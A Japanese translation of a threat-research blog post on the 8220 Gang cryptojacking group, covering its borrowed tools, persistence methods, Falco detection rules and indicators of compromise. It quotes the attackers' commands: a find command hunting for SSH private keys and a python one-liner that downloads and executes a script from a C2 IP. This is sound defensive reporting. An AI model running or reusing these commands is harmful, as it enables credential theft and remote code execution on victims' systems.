本文の内容は、2023年2月14日にCRYSTAL MORIN が投稿したブログ(https://sysdig.com/blog/8220-gang-continues-to-evolve )を元に日本語に翻訳・再構成した内容となっております。
8220 Gangは、2017年にコマンド&コントロール(C2)ネットワーク通信のために8220ポートを最初に使用したため、このような残念な名前で呼ばれる低レベルスクリプトキディーのグループです。2018年後半の最初のTalosレポート 以来、このグループは、クリプトジャッキング の世界でグループ内で協力し合い、学習し、利益を得続けてきました。このグループは、検知を避けるため、あるいはキャンペーンごとに学習して改善を続けているため、戦術、技術、手順(TTP)を定期的に変えていることで、かなりよく知られています。
このブログでは、Sysdigの脅威リサーチチーム が捉えた最近の8220 Gangの攻撃をいくつか紹介します。彼らが現在、どの相手からツールを盗んでいるのか、また、新しく改良されたテクニックに注目します。いつものように、indicators of compromise (IoC) のリストは、ブログの最後に掲載されています。
このギャングはもはやほぼオリジナルではありません
8220 Gangは、他のグループの戦術やテクニックを使用することでよく知られています。その理由としては、盗むのが簡単で、独自のツールを作成するほど洗練されていない、または帰属を隠そうとしているのではないかいうものがあります。
オッカムのカミソリ は、それが前者であることを指し示しています。(*日本では馴染みの無い表現ですが原文になるべく忠実に翻訳しています)
8220 Gangは、
TeamTNT とRocke Groupのスクリプトとマイナー、およびWatchDogドメインのネーミングスタイルを借用していることが、以前報告されています。
過去のキャンペーンの概要
Cisco Talosは2018年12月に8220 Gangについて初めて報告し、同グループの初期の取り組みについて、Struts2、Redis、Weblogicの悪用、whatMinerの使用、悪意のあるDockerイメージの使用などの時系列と説明を示しました。クラウドセキュリティの専門家は、TeamTNTとして知られる脅威要因がこの時期に出現し、同じ脆弱性と設定ミスの多く、特に露出したDockerエンドポイントやRedisの脆弱なインスタンスを悪用したことを思い出すかもしれません。2021年半ば、Laceworkは、修正されたTsunamiベースのIRCボットネットと新しいローダスクリプトに加えて、PwnRigと呼ばれる8220 GangのXMRig亜種を
特定しました 。8220 GangがPwnRigを使用したことは、同グループがスクリプトではなく、コンパイルされたコードに変更を加えた最初の記録であることから、注目されています。8220 Gangは、PwnRigを作成する際にXMRigに変更を加え、IoCとして通常使用される設定ファイルやマイニングプールを難読化しました。
最近では、SentinelOneが2022年7月と10月に8220 Gangについて
報告し 、ボットネットとクリプトマイニングの配布を拡大させています。これらのキャンペーンでは、同グループは、
設定ミスのある脆弱な一般向けホストを引き続き悪用しています。 これらの報告では、PureCrypter Malware-as-a-Service ダウンローダーの使用、
89.34.27[.]167 と 79.110.62[.]23 , の間でのC2インフラの移行、マルウェアを隠すための Discord の使用、および jira?confluence という名前のシェルスクリプトによるリモートサーバからのコマンドのダウンロードなどの新しい TTP を報告しています。
現在の状況は?
2022年11月から2023年1月にかけて、私たちが最近観測した8220 Gangの攻撃は、以前に観測し詳述したものと多くの類似点があり、すなわち最終目的はクリプトジャッキングであることがわかります。このグループは、脆弱なアプリケーションを発見するために、masscanとspiritを使用してインターネットをスキャンし続けています。当然のことながら、私たちが捕捉した3件のうち2件は、悪用可能なOracle Weblogicアプリケーションに対するものでした。同様に、もう1つのキャンペーンは、脆弱性のあるApacheウェブサーバーを攻撃しています。このグループはまた、XMRigのPwnRigフォークをまだデプロイしており、パーシステンスをスケジュールするためにcronを使用しています。
何が変わったのか? 1月のキャプチャーは、キャンペーンのメインC2
185[.]106[.]94[.]146からダウンロードしたxmsというシェルスクリプトを使用しています。11月と1月のキャンペーンの主な違いは、新しい攻撃がより強固になっていることです。その一例は、wgetとcronのバックアップダウンロードツールとしてlwp-downloadが追加されたことです。もう一つは、永続化のためにinit.dサービスを作成することです。また、最新の攻撃では、自分自身を(再)インストールしようとする前に、アクティブなC2接続があるかどうかをチェックします。
8220 Gangは、その取り組みの初期段階において、C2インフラストラクチャーを再利用していました。現在では、このグループがC2 IPアドレスを一貫して変更するようにアップグレードしたことを確信を持って言えます。また、8220 Gangは、oanacronerスクリプトを初めて使用しましたが、これはRocke cryptomingグループで以前から報告されていたものです。11月から1月にかけて、ドメインとIPアドレスの両方がローテーションされました。
さらに1月には、8220 Gangはプライベートキーを見つけるための新しいディスカバリー戦術として、find /root/ /root /home -maxdepth 2 -name id_rsa*というコマンドを使用しました。また、このグループは、bash -shを使用して自分の手順を消去するなど、より多くの防御回避戦術を追加し、彼らのツールセットを収集するために以下のpythonスクリプトをbase64エンコードして導入しました:
python -c “import urllib; exec(urllib.urlopen("http[://]185.106.94.146/e.py").read())”
ATT&CK MatrixとFalcoのカバー範囲
以下の表は、私たちが受け取った3つの8220 Gang 攻撃の間にトリガーされたMITRE ATT&CKに沿ったFalcoのルールを示しています。ネタバレ注意:3つのキャンペーンにまたがって多くの一貫性がありました 最初の表は、複数のキャンペーンでトリガーされたFalcoのルールを示しています。2つ目の表は、1度だけトリガーしたルールで、キャンペーン間の偏差を表しています。
一貫して使用されている8220 Gangのテクニック:
トリガーされたFalco ルール MITRE ATT&CK 戦術
Execution from /tmp
Execution, Privilege escalation, Defense evasion
Suspicious system service modification
Persistence, Privilege escalation, Defense evasion
Modify ld.so.preload
Persistence, Privilege escalation, Defense evasion
Suspicious cron modification
Persistence, Privilege escalation, Defense evasion
Write below root
Persistence, Defense evasion
Launch ingress remote file copy tools in container
Lateral movement
Schedule cron jobs
Execution, Persistence, Privilege escalation
Write below binary dir
Persistence, Defense evasion
Read shell configuration file
Discovery
Write below etc
Persistence, Defense evasion
1月に観測された新しいテクニック:
トリガーされたFalco ルール MITRE ATT&CK 戦術
Detect malicious cmdlines (use of lwp_download)
Execution, Persistence, Privilege escalation
Search private keys or passwords
Discovery
Clear log activities
Defense evasion
Base64-encoded python script execution
Defense evasion
まとめ
8220 Gang は、クラウドの脅威の検知と対応において、依然として有名な存在です。しかし、彼らの活動は自然な形で進行しているため、このようなレッテルはいつの日か意味をなさなくなる可能性があります。クラウドを保護するためのベストプラクティスに従うことで、8220 Gangのような素朴でありながら発展途上のアクターから確実に保護することができます。
Indicators of compromise
C2 IP Addresses
185.106.94[.]146
85.209.134[.]86
51.255.171[.]23
194.38.23[.]170
Filename MD5
linux-d
5cc46e42feea62c6fbe2d600dd5aab51
oanacroner
0621ed468aa68a2b46391e3455a049ec
ircd
63a86932a5bad5da32ebd1689aa814b3
initdr
915aec68a5b53aa7681a461a122594d9
sysdown
90df9de121f55f1d01b370f362d13aca
apache
1bb8edf3ed8693df62bcbfe2fe05dadd
xms
13fe53f6a2632f05c16da40de9bfc829
.bashrc
92c3c4f1c5fb684a1f92cd1ddeb1d9fb
.ntpdate
26803695b83b5e39290d654fcd28774a
pwnrig
6b2b76ffa0926f049dfa28cf03bd8e40
xms
13fe53f6a2632f05c16da40de9bfc829
bashirc.x86_64
63a86932a5bad5da32ebd1689aa814b3
spirit
09c305e3e06bf1a54d28f16a2b38c979
initdr
0ffa42915a8182dca447772138ef4510
bashirc
63a86932a5bad5da32ebd1689aa814b3
.tmpest
a4c97040c898e2ad416d1ddef826491d
masscan
eefc0ce93d254982fbbcd26460f3d10d
jira?confluence
a4c97040c898e2ad416d1ddef826491d
